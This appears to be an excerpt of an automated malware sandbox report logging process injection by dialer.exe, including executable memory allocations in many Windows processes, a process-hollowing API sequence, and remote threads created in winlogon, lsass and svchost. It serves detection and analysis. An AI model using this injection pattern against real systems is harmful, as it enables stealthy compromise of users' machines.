                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: 1990000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20D25DA0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26EF5350000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A7F0D60000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23D0FFB0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B1C2570000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2108BCF0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 29166960000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1988D570000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13869B40000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E1CC740000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2855DA70000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2BF199D0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15AF3890000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21A03B80000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 1CD40E40000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 151A6530000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19E29CC0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17D7B150000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BE621A0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2252F480000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 184683D0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: 1390000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1972E260000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 2246C5E0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 221D5930000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A633B40000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2928D0A0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 1A22A640000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21C6CF30000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 1D349350000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23B60DB0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F22F7C0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F49DCF0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20AF95B0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 24EBE490000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1F5E7FA0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 26F6BA40000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20B657E0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28453480000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Users\user\AppData\Local\Temp\twain_32.exe base: 24B34510000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 216AAA70000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\containerperf\ServerComponenthostMonitorDll.exe base: 1AFC0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1D4EDD40000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 13ACAE60000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\containerperf\lsass.exe base: BA0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\containerperf\lsass.exe base: 1330000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\schtasks.exe base: 1ACD1120000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\containerperf\lsass.exe base: B50000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\schtasks.exe base: 1BB84960000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\containerperf\lsass.exe base: BA0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 18FB6560000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 27F1A600000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1ECA8620000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1A77D1E0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C6117C0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 27614EA0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15F733A0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 2D365CB0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 11840E70000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C67E130000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 24CF8170000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CD66020000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 213113F0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1D211960000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 25F1BEF0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 18FB8360000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 2047E150000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CDF37F0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 2C34E3F0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C611AB0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15038510000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1D92BF30000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CDF3910000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1FB26780000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15038560000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1742D060000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 294ABE90000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\appcompat\powershell.exe base: 770000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21442D80000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1742D180000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\appcompat\powershell.exe base: D80000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 14DDD380000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 278B1D80000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 244424C0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21442FA0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1BE168A0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Windows Defender\Platform\sihost.exe base: 7D0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 278B1EA0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 244424F0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 12615CC0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 255036C0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1F56B300000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28115FE0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Windows Defender\Platform\sihost.exe base: 1190000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1C1574B0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 2B5675A0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 2185C8F0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1C14D340000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 25402690000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 25CD1C10000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Windows Defender\Platform\sihost.exe base: 11C0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\cmd.exe base: 195DDA30000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\cmd.exe base: 195DDC50000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1E984CE0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\schtasks.exe base: 193F0F20000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 19D83000000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Google\Chrome\updater.exe base: 27E70890000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Google\Chrome\updater.exe base: 27E708C0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\chcp.com base: 1FD689F0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\chcp.com base: 1FD68A40000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\containerperf\ServerComponenthostMonitorDll.exe base: F00000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\containerperf\ServerComponenthostMonitorDll.exe base: 1030000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\containerperf\ServerComponenthostMonitorDll.exe base: 1540000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\containerperf\ServerComponenthostMonitorDll.exe base: 1670000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\w32tm.exe base: 216AC280000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\w32tm.exe base: 216AC3A0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\appcompat\powershell.exe base: B50000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\appcompat\powershell.exe base: B80000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Windows Defender\Platform\sihost.exe base: A00000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Windows Defender\Platform\sihost.exe base: F00000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\consent.exe base: 17C74420000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\consent.exe base: 17C76250000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\cmd.exe base: 1AEDEAC0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\cmd.exe base: 1AEDEBE0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\appcompat\powershell.exe base: 790000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 15931960000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\appcompat\powershell.exe base: 1BB00000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\containerperf\lsass.exe base: 1510000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\containerperf\lsass.exe base: 1D750000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Windows Defender\Platform\sihost.exe base: 780000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Windows Defender\Platform\sihost.exe base: 1BB80000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\consent.exe base: 1617D4E0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\consent.exe base: 1617D540000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\cmd.exe base: 1F1A78A0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\cmd.exe base: 1F1A7900000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Windows Defender\Platform\sihost.exe base: 900000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1C8B5AB0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Windows Defender\Platform\sihost.exe base: 10B0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\containerperf\ServerComponenthostMonitorDll.exe base: 1410000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\containerperf\ServerComponenthostMonitorDll.exe base: 1C810000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 21154530000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 21154810000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\consent.exe base: 1B71D230000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\consent.exe base: 1B71D810000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\cmd.exe base: 201FF280000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\containerperf\ServerComponenthostMonitorDll.exe base: 1550000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\cmd.exe base: 201FF410000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1E314900000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\containerperf\ServerComponenthostMonitorDll.exe base: 1CA40000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\appcompat\powershell.exe base: 11D0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\appcompat\powershell.exe base: 19D0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B988570000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 258801A0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeCode function: 20_2_00007FF603B01DB4 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,20_2_00007FF603B01DB4
                                  Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: DC612908
                                  Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: C0AB2908
                                  Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 612D2908
                                  Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\dwm.exe EIP: AEF82908
                                  Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 87992908
                                  Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 53772908
                                  Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D532908
                                  Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 67D2908
                                  Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 5B382908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EBFD2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 59042908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A9E72908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 73162908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4E862908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 473C2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6F9D2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 83BC2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D3F72908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A4152908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BDF32908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C0262908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C9F32908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 645B2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7B2A2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4F62908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2AB42908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4ADB2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1992908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 25DA2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F5352908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F0D62908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FFB2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C2572908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8BCF2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 66962908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 13EF2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8D572908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 69B42908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CC742908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5DA72908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 199D2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F3892908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3B82908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 40E42908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A6532908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 29CC2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7B152908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 621A2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F482908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8B4B2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 683D2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1392908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2E262908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6C5E2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D5932908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FC652908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 78742908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 33B42908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8D0A2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AB4C2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2A642908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6CF32908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 49352908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 60DB2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5E7B2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F7C2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E8152908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 52342908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9DA92908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 602E2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9DCF2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F95B2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BE492908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E7FA2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6BA42908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 657E2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 53482908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 34512908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AAA72908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1AFC2908
                                  Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\conhost.exe EIP: CAE62908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BA2908
